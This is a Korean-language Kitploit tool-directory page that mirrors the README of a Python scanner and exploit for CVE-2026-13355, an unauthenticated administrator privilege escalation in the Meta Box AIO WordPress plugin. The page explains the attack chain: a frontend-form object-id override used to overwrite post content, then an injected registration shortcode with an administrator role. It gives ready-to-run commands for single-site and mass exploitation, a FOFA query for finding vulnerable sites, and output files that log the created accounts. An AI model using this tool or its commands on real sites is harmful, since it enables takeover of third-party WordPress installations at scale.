Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-13355 — CVE-2026-13355에 대한 Python PoC 스캐너 및 익스플로잇으로, Meta Box AIO WordPress 플러그인의 인증되지 않은 관리자 권한 상승 취약점이며, FOFA 대량 스캔 기능을 포함합니다. | Kitploit
도구/GitHubGitHub/murrez/cve-2026-13355
Privilege EscalationReconnaissanceVulnerability ScannersExploitationScripting & AutomationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubmurrez/cve-2026-13355

CVE-2026-13355

CVE-2026-13355에 대한 Python PoC 스캐너 및 익스플로잇으로, Meta Box AIO WordPress 플러그인의 인증되지 않은 관리자 권한 상승 취약점이며, FOFA 대량 스캔 기능을 포함합니다.

31일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

CVE-2026-13355 — Meta Box AIO 비인증 관리자 권한 상승

Python 3 스캐너 및 익스플로잇 개념 증명(PoC)으로, WordPress 번들 Meta Box AIO(및 관련 MB Frontend Submission / MB User Profile 확장)의 CVE-2026-13355 를 대상으로 합니다.

플랫폼WordPress 플러그인
구성 요소Meta Box AIO
영향 받는 버전Meta Box AIO ≤ 3.11.0; MB Frontend Submission ≤ 4.5.6; MB User Profile ≤ 3.11.0
수정 버전Meta Box AIO 3.12.0+ (Form::process() 권한 부여)
CVSS9.8 Critical
인증비인증
CWECWE-269 — 부적절한 권한 관리
연구자h0xilo (Wordfence)

요약

두 개의 번들 확장에 연쇄된 결함으로 인해 비인증 관리자 계정 생성이 가능합니다:

  1. MB Frontend Submission (mbfs) — rwmb_frontend_field_object_id가 인증 없이 폼 대상을 재정의합니다; Form::process()가 user_can_edit()를 생략하므로, 공격자는 wp_update_post()를 호출하여 임의의 게시물/페이지의 post_content 를 덮어쓸 수 있습니다.
  2. MB User Profile (mbup) — 주입된 [mb_user_profile_register role="administrator" auto_login="true"] 숏코드 속성이 역할 검증 없이 신뢰됩니다.

중요: 익스플로잇 체인은 로그인 전용 mbup 폼이 아닌 공개 mbfs(프론트엔드 제출) 폼을 필요로 합니다. 많은 FOFA 검색 결과는 mbup 로그인/등록 UI만 노출하며, 이들은 plugin_mbup_only로 표시되며 이 체인으로는 익스플로잇할 수 없습니다.

요구 사항

  • Python 3.8+
  • pip install -r requirements.txt

빠른 시작

root@kitploit:~
pip install -r requirements.txt

# 단일 대상 — 검사 (기본적으로 라이브 터미널 흐름)
python poc.py -u https://target.example --mode check

# 대량 검사 (--quiet가 아니면 대상당 한 줄)
python poc.py --list targets.example.txt --mode check --threads 20

# 단일 대상 — 익스플로잇 (mbfs 폼 URL + 게시물 ID 필요)
python poc.py -u https://target.example --mode exploit \
  --form-url /contact/ --object-id 12 --verify

# 검사 출력에서 대량 익스플로잇
python poc.py --list candidates.jsonl --mode exploit --threads 5 --verify

FOFA → 대상 목록

예시 쿼리:

root@kitploit:~
body="/wp-content/plugins/meta-box-aio/"

FOFA CSV 내보내기 정규화:

root@kitploit:~
python fofa_to_list.py -i fofa_export.csv
# list.txt + 정규화된 CSV 생성 (로컬 전용, gitignore됨)
python poc.py --list list.txt --mode check --threads 20

CLI 옵션

출력 파일

익스플로잇 실행 시 --vuln-list exploited.txt 를 사용하여 hits.txt의 검사 적중이 덮어쓰이지 않도록 하십시오.

검사 status 값

익스플로잇 참고 사항

  • 포이즌 단계는 ?rwmb_frontend_field_object_id=<id>와 함께 mbfs 폼을 통해 post_content를 POST합니다.
  • 성공하려면 주입된 숏코드가 포이즌된 페이지에서 렌더링되어야 합니다 (strip/KSES 없음, 패치된 플러그인, 잘못된 폼 유형).
  • 연락처/뉴스레터 mbfs 폼은 실제 post_content 필드가 없는 경우가 많으며, 실제로는 덮어쓰기가 실패할 수 있습니다.
  • POST 시 HTTP 403은 일반적으로 WAF/호스트 차단을 나타냅니다.

저장소 구조

root@kitploit:~
.
├── poc.py
├── fofa_to_list.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

로컬 스캔 목록 및 실행 산출물(list.txt, fofa*.csv, *.jsonl, hits*.txt, …)은 .gitignore에 포함되어 있으며 커밋해서는 안 됩니다.

참고 자료

  • NVD — CVE-2026-13355
  • Wordfence 권고
  • Meta Box AIO 변경 로그

법적 고지

승인된 보안 테스트 및 교육 목적으로만 사용하십시오. 관련 법률 및 프로그램 규칙을 준수할 책임은 사용자에게 있습니다.

도구 다운로드
옵션설명
-u, --url단일 기본 URL
--listURL 목록, FOFA 정규화 CSV(url 열), 또는 candidates.jsonl
--modecheck 또는 exploit
--form-url[mb_frontend_form ...] / mbfs-form이 있는 페이지
--object-idrwmb_frontend_field_object_id용 게시물/페이지 ID
--paths프론트엔드 폼을 크롤링할 추가 경로
--username, --email, --password등록 자격 증명 (익스플로잇)
--shortcode주입된 post_content 페이로드 (기본 관리자 등록 숏코드)
--verify등록 후 /wp-admin/ 또는 wp-login.php를 통해 확인
--flow대량 실행 시 대상당 한 줄 스트리밍 (기본값: --list 사용 시)
--no-flow진행 요약만 표시
--quiet, -q최소 콘솔 출력
--threads, -j대량 동시성 (기본값 15)
--outputJSONL 로그 (기본값 cve_2026_13355_results.jsonl)
--vuln-list텍스트 적중/익스플로잇된 줄 (기본값 hits.txt / 익스플로잇 시 exploited.txt 사용)
--candidates-list검사 메타데이터 JSONL (기본값 candidates.jsonl)
파일모드내용
cve_2026_13355_results.jsonl둘 다대상당 전체 JSON
hits.txtcheckcandidate_mbfs 가 있는 URL
candidates.jsonlcheckform_url, object_id, 버전 힌트
exploited.txtexploiturl|user|email|pass|oid=…
상태의미
candidate_mbfs플러그인 존재 + MB Frontend Submission 폼 발견 (익스플로잇 가능성 있음)
plugin_mbup_onlyUser Profile 로그인/등록 폼만 존재 — 이 CVE 체인 아님
plugin_no_frontend_forms플러그인 지문 확인됨, rwmb 프론트엔드 폼 발견되지 않음
patched영향 범위를 초과한 버전 (읽을 수 있는 경우)
no_pluginMeta Box AIO / 확장이 감지되지 않음